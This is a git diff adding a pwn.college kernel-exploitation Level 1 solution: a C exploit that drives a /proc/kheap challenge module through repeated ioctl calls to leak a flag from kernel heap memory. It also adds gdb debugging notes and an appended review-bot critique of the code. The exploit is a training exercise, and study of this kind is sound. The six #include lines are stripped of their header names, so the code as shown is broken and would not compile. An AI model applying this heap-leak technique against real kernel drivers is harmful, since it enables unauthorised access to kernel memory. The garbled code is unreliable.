diff --git a/PwnCollege/KernelExploitation/.gitignore b/PwnCollege/KernelExploitation/.gitignore
new file mode 100644
index 0000000..ba2939b
--- /dev/null
+++ b/PwnCollege/KernelExploitation/.gitignore
@@ -0,0 +1 @@
+!*.ko
\ No newline at end of file
diff --git a/PwnCollege/KernelExploitation/Level1/challenge1.ko b/PwnCollege/KernelExploitation/Level1/challenge1.ko
new file mode 100644
index 0000000..445b0a5
Binary files /dev/null and b/PwnCollege/KernelExploitation/Level1/challenge1.ko differ
diff --git a/PwnCollege/KernelExploitation/Level1/challenge1.ko.i64 b/PwnCollege/KernelExploitation/Level1/challenge1.ko.i64
new file mode 100644
index 0000000..0ff7b43
Binary files /dev/null and b/PwnCollege/KernelExploitation/Level1/challenge1.ko.i64 differ
diff --git a/PwnCollege/KernelExploitation/Level1/exploit.c b/PwnCollege/KernelExploitation/Level1/exploit.c
new file mode 100644
index 0000000..7634ee3
--- /dev/null
+++ b/PwnCollege/KernelExploitation/Level1/exploit.c
@@ -0,0 +1,34 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#define CMD_PRINT 22274
+#define CMD_COPY_FLAG 22276
+#define CMD_COPY_TO_USER 22272
+#define CMD_COPY_FROM_USER 22273
+struct kheap_req_t {
+void * ubuf;
+size_t size;
+};
+int main() {
+int fd = open("/proc/kheap", O_RDWR);
+char buf[0x1000] = {0};
+struct kheap_req_t req = {buf, 0};
+req.size = 0x200;
+memset(buf, '0', 0x1000);
+ioctl(fd, CMD_COPY_FROM_USER, &req);
+for (int i = 0; i < 0x1000; i++)
+ioctl(fd, CMD_COPY_FLAG, &req);
+req.size = 0x1000;
+ioctl(fd, CMD_COPY_TO_USER, &req);
+printf("%s", &buf[0x200]);
+return 0;
+}
+// $ sudo cat /proc/modules
+// gdb> add-symbol-file /challenge/challenge1.ko 0xffffffffc0000000
+// gdb> b kheap_open
+// gdb> b kheap_ioctl
+// A slot is 0x200 bytes.
+// $ gcc exploit.c -o exploit
\ No newline at end of file
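Review bot: `fd` from `open("/proc/kheap", O_RDWR)` in main is passed straight to ioctl() without a check, and none of the ioctl() return values are examined, so a missing device node or a rejected request goes unnoticed and the final printf prints the untouched '0'-filled buffer as if it were a result; add `if (fd < 0) { perror("open"); return 1; }` after the open and test each `ioctl(...) < 0` the same way, and `close(fd)` before returning. The final `printf("%s", &buf[0x200])` also assumes a NUL somewhere in buf, but every byte was set to '0' by memset and then overwritten by a 0x1000-byte copy, so if the copied data contains no NUL the read runs off the end of buf; `fwrite(&buf[0x200], 1, sizeof buf - 0x200, stdout)` bounds it to the buffer. The six `#include` lines appear with no header name as rendered here, which is most likely an extraction artifact rather than the committed text, but in that form the file would not compile. The CMD_* constants would be easier to audit with a comment naming where they came from, e.g. `/* ioctl request numbers for /proc/kheap, taken from the challenge module */`.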